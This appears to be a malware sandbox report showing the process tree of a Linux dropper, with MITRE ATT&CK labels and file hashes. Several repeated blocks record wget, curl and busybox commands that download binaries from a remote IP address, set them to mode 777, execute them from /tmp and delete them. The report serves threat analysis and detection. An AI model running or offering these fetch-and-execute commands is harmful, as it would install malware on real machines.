/usr/bin/curlcurl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Writes file to tmp directory
PID:1624
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:1625
-
-
/bin/chmodchmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- File and Directory Permissions Modification
PID:1626
-
-
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Executes dropped EXE
PID:1627
-
-
/bin/rmrm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:1628
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:1629
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Writes file to tmp directory
PID:1630
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:1631
-
-
/bin/chmodchmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- File and Directory Permissions Modification
PID:1632
-
-
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Executes dropped EXE
PID:1633
-
-
/bin/rmrm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:1634
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:1635
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Writes file to tmp directory
PID:1636
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:1637
-
-
/bin/chmodchmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- File and Directory Permissions Modification
PID:1638
-
-
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Executes dropped EXE
PID:1639
-
-
/bin/rmrm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:1640
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:1641
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Writes file to tmp directory
PID:1642
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:1643
-
-
/bin/chmodchmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- File and Directory Permissions Modification
PID:1644
-
-
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Executes dropped EXE
PID:1645
-
-
/bin/rmrm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:1646
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:1647
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Writes file to tmp directory
PID:1648
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:1649
-
-
/bin/chmodchmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- File and Directory Permissions Modification
PID:1650
-
-
/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Executes dropped EXE
PID:1651
-
-
/bin/rmrm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:1652
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:1653
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Writes file to tmp directory
PID:1654
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:1655
-
-
/bin/chmodchmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- File and Directory Permissions Modification
PID:1656
-
-
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Executes dropped EXE
PID:1657
-
-
/bin/rmrm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:1658
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97